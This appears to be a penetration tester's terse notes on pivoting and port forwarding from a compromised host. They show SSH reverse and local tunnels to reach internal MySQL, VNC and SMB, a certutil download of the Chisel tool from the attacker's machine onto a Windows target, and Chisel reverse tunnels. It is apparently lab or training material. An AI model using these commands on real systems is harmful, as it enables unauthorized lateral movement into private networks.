---------------------
Linux Internal Services (from Target)
tgt> netstat -nl 
tgt> mysql -P 3306 -u root -p
tgt> ssh -R 4444:127.0.0.1:3306 kali@192.168.162.46

kali:
passwd kali                    ..temp change kali pw
service ssh start              ..listen
netstat -alnp | grep 4444
mysql -u root -h 127.0.0.1 -P 4444  
vncviewer -passwd secret localhost:4444 
firefox 127.0.0.1:4444

---------------------
Linux Internal (from Kali)
Requires access to bob w/password
ssh -L 4444:127.0.0.1:5901 -N -f bob@192.168.200.5
vncviewer -passwd secret localhost:4444 

---------------------
Easy Windows Chisel 
netstat -nat | findstr LISTEN | findstr 127 
127.0.0.1:8080 LISTENING 

Share
cd ~/tools/privesc_windows  
python3 -m http.server 80
certutil -urlcache -split -f http://192.168.162.46:80/chisel-amd64.exe  

Kali Server  
./chisel-linux64 server --reverse --port 443  

Windows Connect  
chisel-amd64.exe client 192.168.162.46:443 R:8080:localhost:8080  
  
Kali Firefox  
firefox 127.0.0.1:8080  


---------------------
Windows Pivot to Samba
Found SMB on Remote Box
Get access to the SMB on deeper box. 
Forward a 'deeper' windows-target-smb port back to kali 
We have access to bob@192.168.200.5 w/password 
We can SMB to 10.2.2.2 

Kali:
sudo ssh -N -L 0.0.0.0:445:10.2.2.2:445 bob@192.168.200.5
sudo vim /etc/samba/smb.conf 
min protocol = SMB2 
sudo /etc/init.d/smbd restart 
smbclient -L 127.0.0.1 -U Administrator 

---------------------
Consider: mxtransfer
